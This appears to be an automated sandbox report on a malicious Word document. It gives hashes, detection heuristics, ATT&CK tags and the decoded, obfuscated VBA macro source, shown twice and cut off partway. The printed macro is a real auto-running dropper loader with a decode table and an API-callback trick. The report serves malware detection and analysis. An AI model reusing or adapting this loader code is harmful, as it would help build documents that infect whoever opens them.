Office (OLE) malware analysis — malicious · e4984fb2fb373ff4

MALICIOUS

Office (OLE)

188.5 KB Created: 2017-10-26 12:52:00 Authoring application: Microsoft Office Word First seen: 2017-10-28

MD5: 1621f341e058349973f8d71a3242dd9a SHA-1: 1f9d7ff6562a433282aade6ec78523c5109606e2 SHA-256: e4984fb2fb373ff4ceaf3f6cc40dbfdb092a03df8a58f123136761e821c0cc99

162 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is an Office document containing a VBA macro that is automatically executed upon opening (Document_Open macro). The macro's code is obfuscated and appears to be designed to download and execute a secondary payload. The ClamAV detection 'Doc.Dropper.Agent-6357884-0' further supports this dropper functionality.

Heuristics 5

ClamAV: Doc.Dropper.Agent-6357884-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6357884-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 41417 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	41417 bytes
SHA-256: `17ac33e1653e8caa3c59f09a97ecfc140961c3157dd35bfafbda30d748c79c39`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub eloquence() Dim montserration As String Dim pampering As String goodkinghenry.scathful.Value = Day(#12/5/2013#) varday = verjuice = echinops abraham = "smuggler" corpore = "spurs" aphyllanthes = "antimicrobial" ballistic = "argot" mayan = "bessera" zephyrs = archduchy Set liein = goodkinghenry.scathful.SelectedItem archdukedom = 3 dioxide = 16560 cytoplasm = 167535 Pmt 0, archdukedom, 27926, 18331, 3 unwholesome = liein.Name forces = 65 - 63 + 7842 campaniform = Right(unwholesome, forces) hel = pompos.abelia(campaniform) escritoire = 96 exophagy = 14173 racerunner = 360819 Pmt 0, escritoire, 20888, 39613, 5 sirkar = "guardianship" #If (8 * 2 + 5) > (7 - 2 * 1) And (21 - 7 * 3) * 2 < (Win64) Then Dim chelate As String Dim intercommunion As LongPtr Dim nothofagus As LongPtr Dim lividity As Variant #End If #If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then Dim madid As Long Dim nothofagus As Long Dim jetting As Byte Dim intercommunion As Long #End If pertinence = 14 - 18 + 4 jonquil = "cohere" plagiarize = "sansculottes" gale = 52 - 68 + 4112 amenorrhea = 102 ataractic = 27272 astacus = 288492 Pmt 0, amenorrhea, 5571, 50973, 3 aghan = excalibur tibicen = "feverfew" acathexis = melanotis casebook = 65 mandatary = 7593 taut = 569056 Pmt 0, casebook, 13470, 48997, 7 articles = hel concentrated = "eskimoaleut" bent = "phlomis" intercommunion = fifos.caress(articles) aphididae = "codger" prose = "tectonics" #If (3 * 4 + 5) > (5 - 2 * 1) And (8 - 4 * 2) * 2 < (Win64) Then Dim aborad As String Dim equisetum As LongPtr Dim regards As LongPtr Dim airmail As LongPtr farflung = 113 - 70 + 2021 #End If #If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then Dim equisetum As Long corbeille = 114 - 118 + 785 Dim regards As Long Dim airmail As Long farflung = corbeille + 3459 #End If Dim butacaine As Integer Dim flowage As String equisetum = 66 - 7 - 59 nothofagus = intercommunion + farflung regards = 72 - 77 + 201532 airmail = 20 - 90 + 3570 miwok = chimneystack(regards, equisetum, nothofagus, equisetum, equisetum, equisetum, equisetum) machiavelian = 120 awry = 37172 spavin = 504175 Pmt 0, machiavelian, 22968, 35841, 4 End Sub Private Sub Document_Open() Dim ruddy As String Dim acinonyx As String vandal = "battue" briefly = "cutcherry" eloquence expediently = 110 + 4 anoxemia = 13900 + 1 cavaliere = 205450 + 3 Pmt 0, expediently, 39794, 19857, 5 End Sub Attribute VB_Name = "maggoty" Function exploration() Dim adjustment(255) As Byte nepenthaceae = 102 - 54 + 17 Do While nepenthaceae <= 90 + 1 adjustment(nepenthaceae) = nepenthaceae - 65 nepenthaceae = nepenthaceae + 1 Loop nepenthaceae = 48 Do While nepenthaceae <= 50 + 8 adjustment(nepenthaceae) = nepenthaceae + 4 nepenthaceae = nepenthaceae + 1 Loop nepenthaceae = 97 Do While nepenthaceae <= 120 + 3 adjustment(nepenthaceae) = nepenthaceae - 71 nepenthaceae = nepenthaceae + 1 Loop adjustment(47) = 63 nepenthaceae = 43 adjustment(nepenthaceae) = 60 + 2 exploration = adjustment End Function Attribute VB_Name = "goodkinghenry" Attribute VB_Base = "0{3CAE672C-7924-4EC5-94B4-B3D38609C19B}{37CA9EFC-F940-4287-975A-7CEFB3535807}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "fifos" #If (9 * 3 + 5) > (8 - 3 * 1) And (Win64) > (28 - 7 * 4) * 2 Then Public Declare PtrSafe Function daeva Lib "Shlwapi.dll " Alias _ "SleepConditionVariableSRW" (ByVal verre As Any, admonition As Any, marooned As Any, aphyllanthaceae As Any) As LongPtr Public De ... (truncated)

SHA-256: 17ac33e1653e8caa3c59f09a97ecfc140961c3157dd35bfafbda30d748c79c39

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True





Sub eloquence()
Dim montserration As String
Dim pampering As String
goodkinghenry.scathful.Value = Day(#12/5/2013#)
varday = verjuice = echinops
abraham = "smuggler"
corpore = "spurs"
aphyllanthes = "antimicrobial"
ballistic = "argot"

mayan = "bessera"
zephyrs = archduchy
Set liein = goodkinghenry.scathful.SelectedItem
archdukedom = 3
dioxide = 16560
cytoplasm = 167535
 Pmt 0, archdukedom, 27926, 18331, 3

unwholesome = liein.Name
forces = 65 - 63 + 7842
campaniform = Right(unwholesome, forces)
hel = pompos.abelia(campaniform)
escritoire = 96
exophagy = 14173
racerunner = 360819
 Pmt 0, escritoire, 20888, 39613, 5

sirkar = "guardianship"
#If (8 * 2 + 5) > (7 - 2 * 1) And (21 - 7 * 3) * 2 < (Win64) Then
Dim chelate As String
Dim intercommunion As LongPtr
Dim nothofagus As LongPtr
Dim lividity As Variant
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim madid As Long
Dim nothofagus As Long
Dim jetting As Byte
Dim intercommunion As Long
#End If
pertinence = 14 - 18 + 4
jonquil = "cohere"
plagiarize = "sansculottes"
gale = 52 - 68 + 4112
amenorrhea = 102
ataractic = 27272
astacus = 288492
 Pmt 0, amenorrhea, 5571, 50973, 3

aghan = excalibur
tibicen = "feverfew"
acathexis = melanotis
casebook = 65
mandatary = 7593
taut = 569056
 Pmt 0, casebook, 13470, 48997, 7

articles = hel
concentrated = "eskimoaleut"
bent = "phlomis"
intercommunion = fifos.caress(articles)
aphididae = "codger"
prose = "tectonics"
#If (3 * 4 + 5) > (5 - 2 * 1) And (8 - 4 * 2) * 2 < (Win64) Then
Dim aborad As String
Dim equisetum As LongPtr
Dim regards As LongPtr
Dim airmail As LongPtr
farflung = 113 - 70 + 2021
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (21 - 7 * 3) * 2 < (Win64) Then
Dim equisetum As Long
corbeille = 114 - 118 + 785
Dim regards As Long
Dim airmail As Long
farflung = corbeille + 3459

#End If
Dim butacaine As Integer
Dim flowage As String
equisetum = 66 - 7 - 59
nothofagus = intercommunion + farflung
regards = 72 - 77 + 201532
airmail = 20 - 90 + 3570
miwok = chimneystack(regards, equisetum, nothofagus, equisetum, equisetum, equisetum, equisetum)
machiavelian = 120
awry = 37172
spavin = 504175
 Pmt 0, machiavelian, 22968, 35841, 4

End Sub

Private Sub Document_Open()
Dim ruddy As String
Dim acinonyx As String
vandal = "battue"
briefly = "cutcherry"
eloquence
expediently = 110 + 4
anoxemia = 13900 + 1
cavaliere = 205450 + 3
 Pmt 0, expediently, 39794, 19857, 5
End Sub


Attribute VB_Name = "maggoty"
Function exploration()
Dim adjustment(255) As Byte
nepenthaceae = 102 - 54 + 17
Do While nepenthaceae <= 90 + 1
adjustment(nepenthaceae) = nepenthaceae - 65
nepenthaceae = nepenthaceae + 1
Loop
nepenthaceae = 48
Do While nepenthaceae <= 50 + 8
adjustment(nepenthaceae) = nepenthaceae + 4
nepenthaceae = nepenthaceae + 1
Loop
nepenthaceae = 97
Do While nepenthaceae <= 120 + 3
adjustment(nepenthaceae) = nepenthaceae - 71
nepenthaceae = nepenthaceae + 1
Loop
adjustment(47) = 63
nepenthaceae = 43
adjustment(nepenthaceae) = 60 + 2
exploration = adjustment
End Function


Attribute VB_Name = "goodkinghenry"
Attribute VB_Base = "0{3CAE672C-7924-4EC5-94B4-B3D38609C19B}{37CA9EFC-F940-4287-975A-7CEFB3535807}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "fifos"
#If (9 * 3 + 5) > (8 - 3 * 1) And (Win64) > (28 - 7 * 4) * 2 Then
Public Declare PtrSafe Function daeva Lib "Shlwapi.dll  " Alias _
"SleepConditionVariableSRW" (ByVal verre As Any, admonition As Any, marooned As Any, aphyllanthaceae As Any) As LongPtr
Public De
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.